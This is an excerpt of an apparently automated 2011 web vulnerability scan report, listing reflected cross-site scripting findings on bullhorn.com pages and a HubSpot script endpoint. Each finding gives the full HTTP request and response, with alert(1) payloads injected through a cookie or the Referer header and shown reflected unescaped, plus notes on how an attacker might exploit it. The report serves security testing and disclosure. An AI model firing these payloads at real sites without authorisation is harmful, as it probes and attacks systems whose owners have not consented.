if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1124773",Pid:"p66345759",Arc:"1417957",Location:COMS
...[SNIP]...
44454&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C', "ar_p84053757": 'exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&aaaa3<script>alert(1)</script>1725631997c', "UID": '2206bdab-24.143.206.75-1298208201', "ar_p58096422": 'exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&', "BMX_3PC": '1', "ar_p8
...[SNIP]...

1.134. http://bullhorn.app6.hubspot.com/salog.js.aspx [hubspotutk cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bullhorn.app6.hubspot.com
Path:   /salog.js.aspx

Issue detail

The value of the hubspotutk cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67955'-alert(1)-'d2c4667455a was submitted in the hubspotutk cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /salog.js.aspx HTTP/1.1
Host: bullhorn.app6.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.bullhorn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=mYIedAj8zAEkAAAANjA0ZDE2ZmItYWRmMi00NWQ0LTk2ZmEtMTZjNDMyYTFlYmM10; hubspotutk=14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a; HUBSPOT39=588321964.0.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 08 Mar 2011 11:07:54 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 526


var hsUse20Servers = true;
var hsDayEndsIn = 64325;
var hsWeekEndsIn = 496325;
var hsMonthEndsIn = 2051525;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-03-08 06:07:54";
var hsIsNewVisitor = 0;
var hsFirstVisitValue = "";
var hsut = '14073622-df1e-48f8-8e94-7c149f3dc32367955'-alert(1)-'d2c4667455a';
var hsVisitLogOff = true;


document.write(unescape("%3Cscript src='" + document.location.protocol + "//" + hs_ppa + "/salog20.js?v=2.12' type='text/javascript'%3E%3C/script%3E"));

1.135. http://bullhorn.com/ [Referer HTTP header]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bullhorn.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ed6e'%3balert(1)//c8f3424fcee was submitted in the Referer HTTP header. This input was echoed as 2ed6e';alert(1)//c8f3424fcee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: bullhorn.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=2ed6e'%3balert(1)//c8f3424fcee

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Mar 2011 02:17:24 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
Location: http://www.bullhorn.com/
nnCoection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript">
Set_Cookie('myleadsource', 'Search - SEO','');
Set_Cookie('myleadpromocode', 'Google','');
Set_Cookie('myleadkeyword', '2ed6e';alert(1)//c8f3424fcee','');
</script>
...[SNIP]...

1.136. http://bullhorn.com/newsrelease-details.php [Referer HTTP header]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bullhorn.com
Path:   /newsrelease-details.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9345'%3balert(1)//ea0a3ade1f5 was submitted in the Referer HTTP header. This input was echoed as d9345';alert(1)//ea0a3ade1f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /newsrelease-details.php HTTP/1.1
Host: bullhorn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d9345'%3balert(1)//ea0a3ade1f5

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Mar 2011 12:01:45 GMT
Server: Apache/2.2.17 (Fedora)
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=hb08jc54d56psadf8ai8mbphq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.bullhorn.com/newsrelease-details.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<script type="text/javascript">
Set_Cookie('myleadsource', 'Search - SEO','');
Set_Cookie('myleadpromocode', 'Google','');
Set_Cookie('myleadkeyword', 'd9345';alert(1)//ea0a3ade1f5','');
</script>
...[SNIP]...
